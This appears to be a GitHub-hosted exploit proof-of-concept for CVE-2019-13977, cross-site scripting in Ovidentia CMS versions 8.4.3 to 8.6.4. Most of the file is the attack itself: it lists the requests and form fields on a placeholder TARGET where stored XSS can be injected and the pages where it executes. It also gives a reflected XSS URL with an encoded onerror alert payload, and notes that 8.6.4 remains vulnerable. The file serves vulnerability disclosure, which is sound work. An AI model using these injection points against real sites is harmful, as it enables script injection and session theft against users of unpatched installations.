Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
69 lines (56 sloc) 2.16 KB
#-------------------------------------------------------
# Exploit Title: Ovidentia CMS - XSS Ovidentia 8.4.3
# The vulnerability permits any kind of XSS attacks. Reflected, DOM and Stored XSS.
# Date: 06/05/2019
# [ CVE-2019-13977 ]
# Exploit Author:
# Fernando Pinheiro (n3k00n3)
# Victor Flores (UserX)
# Vendor Homepage: https://www.ovidentia.org/
# Version: 8.4.3 <= 8.6.4
# Tested on: Mac,linux - Firefox, safari
# Download http://en.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FDistributions&file=ovidentia-8-4-3.zip&idf=893
#
# [ Kitsun3Sec Research Group ]
#--------------------------------------------------------
POC
>========================================================
Stored XSS
>========================================================
1. POST http://TARGET/ovidentia/index.php?tg=groups
Field:
nom
2. POST http://TARGET/ovidentia/index.php?tg=maildoms&idx=create&userid=0&bgrp=y
Fields:
Nom
Description
3. GET http://TARGET/ovidentia/index.php?tg=delegat
Show groups
4. POST http://TARGET/ovidentia/index.php?tg=site&idx=create
http://TARGET/ovidentia/index.php?tg=site&item=4
Fields:
Nom
address
description
5. POST http://TARGET/ovidentia/index.php?tg=admdir&idx=mdb&id=1
Fields:
Libellé du champ
Explosion:
http://TARGET/ovidentia/index.php?tg=forums&idx=notices
http://TARGET/ovidentia/index.php?tg=admdir&idx=dispdb&id=1
http://TARGET/ovidentia/index.php?tg=admdir&idx=lorddb&id=1
6. POST http://TARGET/ovidentia/index.php?tg=notes&idx=Create
Fields: Notes
Explosion:
http://TARGET/ovidentia/index.php?tg=notes&idx=List
7. POST http://TARGET/ovidentia/index.php?tg=admfaqs&idx=Add
Fields: all
Explosion:
http://TARGET/ovidentia/index.php?tg=admfaqs&idx=Categories#bab_faq_2
>========================================================
REFLECTED
>========================================================
1. GET http://TARGET/ovidentia/index.php?tg=admoc&idx=addoc&item=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E
---
[CHANGELOG]
4th of August of 2019 - Ovidentia 8.6.4 tested and failed to prevent the attack, therefore still vulnerable.
You can’t perform that action at this time.